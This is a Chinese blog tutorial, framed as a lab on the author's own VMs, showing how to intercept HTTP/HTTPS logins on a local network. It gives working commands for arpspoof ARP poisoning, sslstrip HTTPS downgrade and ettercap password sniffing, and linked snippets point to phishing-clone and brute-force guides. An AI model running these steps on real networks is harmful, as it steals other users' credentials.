Kali获取HTTP/HTTPS账号密码获取实验

最新推荐文章于 2025-01-27 10:58:15 发布
最新推荐文章于 2025-01-27 10:58:15 发布
阅读量1w 收藏 127
点赞数 10
文章标签: arp欺骗 Kali 局域网渗透 http/https 密码嗅探
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/100054271
版权

此次实验需要配合arp欺骗,对arp欺骗一脸懵的可以参考我以前写的帖子

传送门

这里介绍一下http/https协议:

   http:   1. 无状态:协议对客户端没有状态存储,对事物处理没有“记忆”能力,比如访问一个网站需要反复进行登录操作
	        2. 无连接:HTTP/1.1之前,由于无状态特点,每次请求需要通过TCP三次握手四次挥手,和服务器重新建立连接。				                 
	        3. 基于请求和响应:基本的特性,由客户端发起请求,服务端响应
	        4. 简单快速、灵活
	        5. 通信使用明文、请求和响应不会对通信方进行确认、无法保护数据的完整性
	        6. 多次请求同一个资源,服务器并不能区别是否已经响应过用户的请求,所以每次需要重新响应请求,需要耗费不必要的时间和流量。
	        简单来说 HTTP协议是进行明文传输的,即在传输过程中不对数据进行加密,因为http的不安全性,所以在局域网环境中,可以通过ARP欺骗,将目标主机的网络数据包都流经攻击者,然后再通过嗅探的方式从而获取到HTTP的一些数据信息。下面主要是利用ettercap来进行嗅探
	       
   https:   基于HTTP协议,通过SSL或TLS提供加密处理数据、验证对方身份以及数据完整性保护,而且https内容传输加密:采用混合加密技术,中间者无法直接查看明文内容,相比http,https能很好保护数据完整性,防止传输的内容被中间人冒充或者篡改

实验环境

攻击机:linux Kali
靶机:window 10
网络环境:虚拟机桥接
网关:192.168.31.1

实验步骤

1.到Kali中开启转发流量不然arp欺骗后靶机会无法访问网络!:

echo 1 > /proc/sys/net/ipv4/ip_forward

cat 查看,显示1 证明开启成功
在这里插入图片描述

2.因为我们也需要对https网站进行嗅探,但由于https的安全特性,所以我们需要到Kali更改Sslstrip 配置文件,然后把https转换为http,使用sslstrip进行转换

/ /Sslstrip, 主要是使用中间人攻击方式,在客户端到 服务器之间设置一个代理服务器,然后代理服务器会使用其相应的有效 SSL 证书连接客户端到真实服务器,所以从而绕过服务端的检测**

   命令行输入: vim  /etc/ettercap/etter.conf

在这里插入图片描述
vim进入后,按下 i 键,进入编辑模式,找到#if you use iptables:下面的两个#注释去掉。然后按下Esc,Shift+:(冒号),wq(保存,退出)

3.使用sslstrip

sslstrip -a -f -k

在这里插入图片描述
4.接下来进行arp欺骗

先看看arp欺骗前的网关Mac

windown 10 cmd 输入:arp -a

在这里插入图片描述
可以看到欺骗前的网关Mac地址正常,没有收到污染,接下来开始arp欺骗

arpspoof -i ech0 -t 192.168.31.111 192.168.31.1
arpspoof -i ech0(网卡)  -t  目标机ip  本地局域网关

在这里插入图片描述
再次查看网关Mac
在这里插入图片描述
5.欺骗成功,然后利用ettercap进行https/http密码嗅探

Kali终端输入:ettercap -Tq -i eth0
-T:启动文本模式  q:安静模式  -i:攻击机网卡

登录一个https网站
在这里插入图片描述
当靶机有人登录https协议的网站的时候账号密码都会在上面显示的了
在这里插入图片描述
成功嗅探登录用户名及密码

kali获取局域网内的http账号密码
silence-cc的博客
08-28 2920
环境: 虚拟机安装有kali作为攻击机, 靶机为自己的物理机win10。 网关为192.168.2.1, 测试网站为批处理之家 kali要安装disniff,原因时没法使用arpspoof,而使用arpspoof则要安装disniff。 目的:验证是否能通过arp攻击来获取局域网内的http网站账号密码。 参考文章:B站的 kali使用ettercap抓取账号密码使用教程 步骤如下: 使用的相关命令如下: nmap -sP 192.168.2.1-255 扫
关于Kali获取HTTP账号密码的学习笔记
Mi1k7ea
03-14 6563
HTTP协议是进行明文传输的,即在传输过程中不对数据进行加密。在局域网环境中,通过ARP欺骗,将目标主机的网络包都流经攻击者,然后再通过嗅探的方式从而获取HTTP的一些数据信息。下面主要是利用ettercap来进行嗅探,目标主机还是选择Ubuntu。 先是在Kali中开启转发流量: echo 1 > /proc/sys/net/ipv4/ip_forward 进行A
kali渗透实战3---HTTP账号密码获取
spec_yue
04-01 2414
这篇文章的基础是kali渗透实战2,需要提前知晓的知识:arp欺诈,让宿主机的流量进过本机转发 ettercap attercap -Tq -i eth0 这样就能截取密码了,用我自己做的网站为例 点击登录之后看看kali的机器能不能截取密码 登录成功,去看看kali 如图,已经获取到了用户名密码,可见网站仅仅有csrf防护是不够的,我试了一下qq的账户密码是不可获取的,下一步需要完善一下...
Kali-Linux安装】VMware虚拟机及kali的安装教程与VMware虚拟网络编辑
AlgoZZi的博客
01-27 1070
在当今的信息技术时代,虚拟化技术已成为推动计算效率和创新的关键力量。本文将带你了解虚拟机的概念,以及如何利用这一强大的虚拟化软件来创建和管理虚拟环境。我们将探讨虚拟机的不同网络模式,包括NAT、桥接和仅主机模式,并讲解Kali Linux在VMware中的安装过程。无论你是安全专家、开发人员,还是对虚拟化技术感兴趣的爱好者,希望本文为你提供宝贵的信息和实用的操作指南。本文介绍了虚拟机与 VMware的基本概念,阐述了 VMware Workstation的功能和优势,并逐步指导了 VMware的安装过程。
小白日记22:kali渗透测试之提权(二)--抓包嗅探
ZiXuanFY的博客
09-23 5874
抓包嗅探 通过抓包嗅探目标机器的流量,发现账号密码。 Windows系统 1、Wirehshark 2、Omnipeek 3、commview 4、Sniffpass 只会抓取识别传输密码的明文协议,并提取密码 Linux系统 1、Tcpdump 2、Wirehshark 3、Dsniff 类似Sniffpas
kali 通过setoolkit-网站克隆获得账户密码
qq_33391644的博客
12-22 2777
注意:请确保80端口未被别的进程占用,否则会失败 一、启动setoolkit: 命令:setoolkit 二、输入1(Social-Engineering Attacks(社会工程攻击)) 三、输入2(Website Attack Vectors(网站攻击载荷)) 四、输入3(Credential Harvester Attack Method(凭据收割机攻击方法)) 五、...
HTTP/HTTPS账号密码获取
Hydrakingbo
09-07 1万+
kali系统命令: arpspoof -i 网卡 -t 目标IP 网关      #断网攻击 echo 1 > /proc/sys/net/ipv4/ip_forword  # 写入 1 表示开启转发功能! 可以用cat查看修改: cat /proc/sys/net/ipv4/ip_forword  # 显示1表示成功开启转发功能,0表示未开启 arp
学习笔记:kaili linux获取同网段的账号和密码
weixin_44803302的博客
06-23 471
环境:攻击者:kali2020 靶机:windowxp kaili的ip Windowxp的IP 测试能不能ping通 路由的转发,确保目标主机正常上网 欺骗目标,我就是网关,开始arp欺骗 再另一个端口嗅探登录密码 打开windowXP上网打开一个http网站(这里用的是4399) 点击登录输入密码(错误的密码也可以)主要是做实验嗅到密码为主 打开kali查看已经嗅到密码 最后一步上www.cmd5.com 上解密即可 最后,此文只是向大家展示一下kaili渗透的相关过程,任何人不得用
ARP欺骗攻击利用之抓取https协议的用户名密码
2301_81475812的博客
02-08 1714
找到下红框的内容,输入字母i进入编辑模式,把#注释符去掉,按键盘右上角ESC键退出编辑模式,进入命令行模式,同时按住shift键与冒号键:然后输入wq进行保存并退出。因此,这个命令的作用是在中间人攻击中使用sslstrip工具将HTTPS连接转换为HTTP连接,并将所有请求重定向到攻击者控制的设备上,同时忽略证书错误。命令执行:apt-get install sslstrip。-T:启动文本模式 q:安静模式 -i:攻击机网卡。命令执行:sslstrip -a -f –k。启动第二kali终端。
Kali 实现爆破获取用户名密码
热门推荐
tryheart的博客
08-26 1万+
preferen–setting 然后在浏览器里面输入搭建好的服务器地址 右键 看长度
局域网内的HTTP/HTTPS账号密码获取 实验
qq_41453632的博客
11-03 4653
实验工具:                 kali  linux                 arpspoof    >   欺骗                 ettercap     >   欺骗   DNS欺骗  流量嗅探 实验环境:            攻击机:kali                ip地址:172.27.13.31          ...
beef获取目标主机用户名密码.docx
03-29
* 访问 Beef:在 Kali 主机浏览器中输入 http://192.168.1.2:3000/ui/panel,访问 Beef。 * 钓鱼攻击:使用 Beef 的社会工程学攻击功能,例如 Pretty Theft,窃取目标主机的用户名密码。 四、Beef 的社会工程学...
kali Linux 使用Metasploit爆破Tomcat密码
2201_75509440的博客
06-30 743
Apache tomcat是世界上使用最广泛的java web应用服务器之一,绝大多数人都会使用tomcat的默认配置。默认配置中会有一个向外网开放的web应用管理器,管理员可以利用它在服务器中启动、停止、添加和删除应用。在本节中,将使用metasploit某个模块对tomcat管理界面实施密码暴力破解攻击以获得一个管理器的访问权限Apache Tomcat,通常简称为Tomcat,是一个开源的Java Servlet容器,也是一个用于在Java环境下运行Web应用程序的Web服务器。
kali渗透实验二 网络嗅探与身份认证
ANYOUZHEN的博客
12-05 1768
实验目的:1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。2、研究交换环境下的网络嗅探实现及防范方法,研究并利用ARP协议的安全漏洞,通过Arpspoof实现ARP欺骗以捕获内网其他用户数据。3、能利用BrupSuite实现网站登录暴力破解获得登录密码。4、能实现ZIP密码破解,理解安全密码的概念和设置。系统环境:Kali Linux 2、Windows网络环境
卡莉Linux存储库支持HTTPS
教程大咖的CSDN创作中心
08-20 900
几周前我们增加了更多的HTTPS支持卡莉的基础设施,并希望给用户一些指导和指出有什么新鲜事。 当我们卡莉Linux下载页面(和shasums)一直是通过HTTPS,我们的镜子转向器。 现在,我们每周生成图像,获得镜子转向器已经变得至关重要。 https://cdimage.kali.org 这是我们的镜子转向器卡莉形象。 这个服务器接受你从我们的下载请求官方下载页面,然后是你的请求的文件从地理...
利用Kali Linux获取http协议加密的账户密码
湖北杰哥的博客
11-22 7220
利用Kali Linux获取http协议加密的账户密码
拿服务器用户名密码思路和过程如下:
Susan_web的博客
01-06 722
关于拿服务器的用户名密码的思路
KALI入门到入狱之wifi抓包破解局域网密码
weixin_55357256的博客
04-08 2078
wifite抓包破解密码
TCP三次握手分析、http登录密码抓取
琳小白的博客
03-11 7731
概述:本次实验利用Wireshark先对TCP三次握手原理进行分析,解释TCP连接建立的过程,并用“两军问题”解释为什么要进行三次握手;然后分析TCP连接的安全性,概述SYN洪范攻击和SSL,利用Wireshark抓取http登录密码,证明http是明文传输,数据不安全,而https是密文传输,安全可靠;最后对免费WiFi热点的安全性提出自己的一些思考。一,Wireshark分析TCP三次握手1,抓
kali获取账号密码
最新发布
02-07
### Kali Linux 账号密码管理教程 #### 默认账号与密码设置 对于不同版本的 Kali Linux,默认的账号和密码有所不同。早期版本中,预设的登录凭证为: - 用户名:`root` - 密码:`toor` 然而,在更新至2020版之后,官方调整了这一设定,新的默认组合变为[^1]: - 用户名:`kali` - 密码:`kali` 值得注意的是,如果用户在初次安装过程中自定义设置了管理员(root)级别的密码,则该次安装后的系统将采用此自定义密码作为root用户的访问密钥[^2]。 #### 如何安全地重置遗忘的密码 当遇到忘记密码的情况时,可以通过以下方法来恢复对系统的控制权而不必担心数据丢失的风险。具体操作如下[^3]: 1. **启动修复模式** 当计算机正在引导加载程序界面停留时,选择带有`(recovery mode)`字样的选项,并按下键盘上的"E"键编辑内核参数。 2. **编辑启动项** 找到含有`linux`关键字的那一行指令,在其末尾追加`init=/bin/bash rw`字符串替换原有的只读属性(`ro`)以及图形化进度条(`quiet splash`)部分的内容。 3. **执行临时变更** 完成上述修改后,通过按压`Ctrl+X`或点击`F10`使改动生效并继续正常开机流程直至到达命令提示符状态。 4. **更改现有账户密码** 使用`passwd`工具可以方便快捷地实现这一点。例如要改变超级用户(root)的新密码应输入: ```bash passwd root ``` 5. **保存变动并重启** 成功创建新密码后记得同步文件系统以防止意外情况发生:`mount -o remount,ro /`;随后可利用`exec init`或者直接物理断电再上电的方式让机器恢复正常运作。 ```bash # 更改普通用户'kali'的密码示例 passwd kali ```
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值